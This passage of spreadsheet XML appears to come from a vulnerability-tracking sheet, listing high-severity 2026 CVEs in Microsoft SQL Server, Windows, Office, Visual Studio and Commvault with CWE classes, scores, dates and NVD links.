r="R202" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S202" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t></is></c></row><row r="203"><c r="A203" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C203" s="5" t="inlineStr"><is><t>CVE-2026-73016</t></is></c><c r="D203" s="5" t="n"><v>8.800000000000001</v></c><c r="E203" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F203" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G203" s="5" t="inlineStr" /><c r="H203" s="5" t="n"><v>0.006</v></c><c r="I203" s="5" t="inlineStr" /><c r="J203" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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03" s="5" t="inlineStr" /><c r="M203" s="5" t="inlineStr" /><c r="N203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P203" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q203" s="5" t="inlineStr" /><c r="R203" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S203" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t></is></c></row><row r="204"><c r="A204" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C204" s="5" t="inlineStr"><is><t>CVE-2026-73018</t></is></c><c r="D204" s="5" t="n"><v>8.800000000000001</v></c><c r="E204" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F204" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G204" s="5" t="inlineStr" /><c r="H204" s="5" t="n"><v>0.008</v></c><c r="I204" s="5" t="inlineStr" /><c r="J204" s="5" t="inlineStr" /><c r="K204" s="5" t="inlineStr" /><c r="L204" s="5" t="inlineStr" /><c r="M204" s="5" t="inlineStr" /><c r="N204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P204" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q204" s="5" t="inlineStr" /><c r="R204" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S204" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t></is></c></row><row r="205"><c r="A205" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C205" s="5" t="inlineStr"><is><t>CVE-2026-73023</t></is></c><c r="D205" s="5" t="n"><v>8.800000000000001</v></c><c r="E205" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F205" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G205" s="5" t="inlineStr" /><c r="H205" s="5" t="n"><v>0.006</v></c><c r="I205" s="5" t="inlineStr" /><c r="J205" s="5" t="inlineStr" /><c r="K205" s="5" t="inlineStr" /><c r="L205" s="5" t="inlineStr" /><c r="M205" s="5" t="inlineStr" /><c r="N205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P205" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q205" s="5" t="inlineStr" /><c r="R205" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S205" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t></is></c></row><row r="206"><c r="A206" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B206" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C206" s="5" t="inlineStr"><is><t>CVE-2026-73028</t></is></c><c r="D206" s="5" t="n"><v>8.800000000000001</v></c><c r="E206" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F206" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G206" s="5" t="inlineStr" /><c r="H206" s="5" t="n"><v>0.005</v></c><c r="I206" s="5" t="inlineStr" /><c r="J206" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K206" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L206" s="5" t="inlineStr" /><c r="M206" s="5" t="inlineStr" /><c r="N206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O206" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P206" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q206" s="5" t="inlineStr" /><c r="R206" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S206" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t></is></c></row><row r="207"><c r="A207" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B207" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C207" s="5" t="inlineStr"><is><t>CVE-2026-77105</t></is></c><c r="D207" s="5" t="n"><v>8.800000000000001</v></c><c r="E207" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G207" s="5" t="inlineStr" /><c r="H207" s="5" t="n"><v>0.002</v></c><c r="I207" s="5" t="inlineStr" /><c r="J207" s="5" t="inlineStr" /><c r="K207" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L207" s="5" t="inlineStr" /><c r="M207" s="5" t="inlineStr" /><c r="N207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P207" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q207" s="5" t="inlineStr" /><c r="R207" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S207" s="5" t="inlineStr"><is><t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t></is></c><c r="T207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t></is></c></row><row r="208"><c r="A208" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B208" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C208" s="5" t="inlineStr"><is><t>CVE-2026-77106</t></is></c><c r="D208" s="5" t="n"><v>8.800000000000001</v></c><c r="E208" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G208" s="5" t="inlineStr" /><c r="H208" s="5" t="n"><v>0.003</v></c><c r="I208" s="5" t="inlineStr" /><c r="J208" s="5" t="inlineStr" /><c r="K208" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L208" s="5" t="inlineStr" /><c r="M208" s="5" t="inlineStr" /><c r="N208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O208" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P208" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q208" s="5" t="inlineStr" /><c r="R208" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S208" s="5" t="inlineStr"><is><t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t></is></c><c r="T208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t></is></c></row><row r="209"><c r="A209" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C209" s="5" t="inlineStr"><is><t>CVE-2026-77480</t></is></c><c r="D209" s="5" t="n"><v>8.800000000000001</v></c><c r="E209" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F209" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G209" s="5" t="inlineStr" /><c r="H209" s="5" t="n"><v>0.005</v></c><c r="I209" s="5" t="inlineStr" /><c r="J209" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K209" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L209" s="5" t="inlineStr" /><c r="M209" s="5" t="inlineStr" /><c r="N209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P209" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q209" s="5" t="inlineStr" /><c r="R209" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S209" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t></is></c></row><row r="210"><c r="A210" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C210" s="5" t="inlineStr"><is><t>CVE-2026-77481</t></is></c><c r="D210" s="5" t="n"><v>8.800000000000001</v></c><c r="E210" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F210" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G210" s="5" t="inlineStr" /><c r="H210" s="5" t="n"><v>0.006</v></c><c r="I210" s="5" t="inlineStr" /><c r="J210" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K210" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L210" s="5" t="inlineStr" /><c r="M210" s="5" t="inlineStr" /><c r="N210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P210" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q210" s="5" t="inlineStr" /><c r="R210" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S210" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t></is></c></row><row r="211"><c r="A211" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B211" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C211" s="5" t="inlineStr"><is><t>CVE-2026-77482</t></is></c><c r="D211" s="5" t="n"><v>8.800000000000001</v></c><c r="E211" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F211" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G211" s="5" t="inlineStr" /><c r="H211" s="5" t="n"><v>0.008</v></c><c r="I211" s="5" t="inlineStr" /><c r="J211" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K211" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L211" s="5" t="inlineStr" /><c r="M211" s="5" t="inlineStr" /><c r="N211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O211" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P211" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q211" s="5" t="inlineStr" /><c r="R211" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S211" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t></is></c></row><row r="212"><c r="A212" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C212" s="5" t="inlineStr"><is><t>CVE-2026-77483</t></is></c><c r="D212" s="5" t="n"><v>8.800000000000001</v></c><c r="E212" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F212" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G212" s="5" t="inlineStr" /><c r="H212" s="5" t="n"><v>0.005</v></c><c r="I212" s="5" t="inlineStr" /><c r="J212" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K212" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L212" s="5" t="inlineStr" /><c r="M212" s="5" t="inlineStr" /><c r="N212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P212" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q212" s="5" t="inlineStr" /><c r="R212" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S212" s="5" t="inlineStr"><is><t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t></is></c></row><row r="213"><c r="A213" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B213" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C213" s="5" t="inlineStr"><is><t>CVE-2026-77484</t></is></c><c r="D213" s="5" t="n"><v>8.800000000000001</v></c><c r="E213" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F213" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G213" s="5" t="inlineStr" /><c r="H213" s="5" t="n"><v>0.011</v></c><c r="I213" s="5" t="inlineStr" /><c r="J213" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K213" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L213" s="5" t="inlineStr" /><c r="M213" s="5" t="inlineStr" /><c r="N213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O213" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P213" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q213" s="5" t="inlineStr" /><c r="R213" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S213" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t></is></c></row><row r="214"><c r="A214" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B214" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C214" s="5" t="inlineStr"><is><t>CVE-2026-77486</t></is></c><c r="D214" s="5" t="n"><v>8.800000000000001</v></c><c r="E214" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F214" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G214" s="5" t="inlineStr" /><c r="H214" s="5" t="n"><v>0.005</v></c><c r="I214" s="5" t="inlineStr" /><c r="J214" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K214" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L214" s="5" t="inlineStr" /><c r="M214" s="5" t="inlineStr" /><c r="N214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O214" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P214" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q214" s="5" t="inlineStr" /><c r="R214" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S214" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t></is></c></row><row r="215"><c r="A215" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B215" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C215" s="5" t="inlineStr"><is><t>CVE-2026-77487</t></is></c><c r="D215" s="5" t="n"><v>8.800000000000001</v></c><c r="E215" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F215" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G215" s="5" t="inlineStr" /><c r="H215" s="5" t="n"><v>0.005</v></c><c r="I215" s="5" t="inlineStr" /><c r="J215" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K215" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L215" s="5" t="inlineStr" /><c r="M215" s="5" t="inlineStr" /><c r="N215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O215" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P215" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q215" s="5" t="inlineStr" /><c r="R215" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S215" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t></is></c></row><row r="216"><c r="A216" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C216" s="5" t="inlineStr"><is><t>CVE-2026-77495</t></is></c><c r="D216" s="5" t="n"><v>8.800000000000001</v></c><c r="E216" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F216" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G216" s="5" t="inlineStr" /><c r="H216" s="5" t="n"><v>0.006</v></c><c r="I216" s="5" t="inlineStr" /><c r="J216" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K21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16" s="5" t="inlineStr" /><c r="M216" s="5" t="inlineStr" /><c r="N216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P216" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q216" s="5" t="inlineStr" /><c r="R216" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S216" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t></is></c></row><row r="217"><c r="A217" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B217" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C217" s="5" t="inlineStr"><is><t>CVE-2026-77504</t></is></c><c r="D217" s="5" t="n"><v>8.800000000000001</v></c><c r="E217" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F217" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G217" s="5" t="inlineStr" /><c r="H217" s="5" t="n"><v>0.006</v></c><c r="I217" s="5" t="inlineStr" /><c r="J217" s="5" t="inlineStr" /><c r="K217" s="5" t="inlineStr" /><c r="L217" s="5" t="inlineStr" /><c r="M217" s="5" t="inlineStr" /><c r="N217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P217" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q217" s="5" t="inlineStr" /><c r="R217" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S217" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t></is></c></row><row r="218"><c r="A218" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C218" s="5" t="inlineStr"><is><t>CVE-2026-77901</t></is></c><c r="D218" s="5" t="n"><v>8.800000000000001</v></c><c r="E218" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F218" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G218" s="5" t="inlineStr" /><c r="H218" s="5" t="n"><v>0.006</v></c><c r="I218" s="5" t="inlineStr" /><c r="J218" s="5" t="inlineStr" /><c r="K218" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L218" s="5" t="inlineStr" /><c r="M218" s="5" t="inlineStr" /><c r="N218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P218" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q218" s="5" t="inlineStr" /><c r="R218" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S218" s="5" t="inlineStr"><is><t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t></is></c></row><row r="219"><c r="A219" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C219" s="5" t="inlineStr"><is><t>CVE-2026-77906</t></is></c><c r="D219" s="5" t="n"><v>8.800000000000001</v></c><c r="E219" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F219" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G219" s="5" t="inlineStr" /><c r="H219" s="5" t="n"><v>0.008</v></c><c r="I219" s="5" t="inlineStr" /><c r="J219" s="5" t="inlineStr" /><c r="K219" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L219" s="5" t="inlineStr" /><c r="M219" s="5" t="inlineStr" /><c r="N219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P219" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q219" s="5" t="inlineStr" /><c r="R219" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S219" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t></is></c></row><row r="220"><c r="A220" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C220" s="5" t="inlineStr"><is><t>CVE-2026-77907</t></is></c><c r="D220" s="5" t="n"><v>8.800000000000001</v></c><c r="E220" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G220" s="5" t="inlineStr" /><c r="H220" s="5" t="n"><v>0.005</v></c><c r="I220" s="5" t="inlineStr" /><c r="J220" s="5" t="inlineStr" /><c r="K220" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L220" s="5" t="inlineStr" /><c r="M220" s="5" t="inlineStr" /><c r="N220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P220" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q220" s="5" t="inlineStr" /><c r="R220" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S220" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t></is></c></row><row r="221"><c r="A221" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B221" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C221" s="5" t="inlineStr"><is><t>CVE-2026-77908</t></is></c><c r="D221" s="5" t="n"><v>8.800000000000001</v></c><c r="E221" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F221" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G221" s="5" t="inlineStr" /><c r="H221" s="5" t="n"><v>0.007</v></c><c r="I221" s="5" t="inlineStr" /><c r="J221" s="5" t="inlineStr" /><c r="K221" s="5" t="inlineStr" /><c r="L221" s="5" t="inlineStr" /><c r="M221" s="5" t="inlineStr" /><c r="N221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O221" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P221" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q221" s="5" t="inlineStr" /><c r="R221" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S221" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="T221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t></is></c></row><row r="222"><c r="A222" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C222" s="5" t="inlineStr"><is><t>CVE-2026-78439</t></is></c><c r="D222" s="5" t="n"><v>8.800000000000001</v></c><c r="E222" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F222" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G222" s="5" t="inlineStr" /><c r="H222" s="5" t="n"><v>0.006</v></c><c r="I222" s="5" t="inlineStr" /><c r="J222" s="5" t="inlineStr" /><c r="K222" s="5" t="inlineStr" /><c r="L222" s="5" t="inlineStr" /><c r="M222" s="5" t="inlineStr" /><c r="N222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P222" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q222" s="5" t="inlineStr" /><c r="R222" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S222" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t></is></c></row><row r="223"><c r="A223" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B223" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C223" s="5" t="inlineStr"><is><t>CVE-2026-78442</t></is></c><c r="D223" s="5" t="n"><v>8.800000000000001</v></c><c r="E223" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F223" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G223" s="5" t="inlineStr" /><c r="H223" s="5" t="n"><v>0.006</v></c><c r="I223" s="5" t="inlineStr" /><c r="J223" s="5" t="inlineStr" /><c r="K223" s="5" t="inlineStr" /><c r="L223" s="5" t="inlineStr" /><c r="M223" s="5" t="inlineStr" /><c r="N223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P223" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q223" s="5" t="inlineStr" /><c r="R223" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S223" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t></is></c></row><row r="224"><c r="A224" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C224" s="5" t="inlineStr"><is><t>CVE-2026-78456</t></is></c><c r="D224" s="5" t="n"><v>8.800000000000001</v></c><c r="E224" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F224" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G224" s="5" t="inlineStr" /><c r="H224" s="5" t="n"><v>0.008999999999999999</v></c><c r="I224" s="5" t="inlineStr" /><c r="J224" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K224" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022</t></is></c><c r="L224" s="5" t="inlineStr" /><c r="M224" s="5" t="inlineStr" /><c r="N224" s="5" 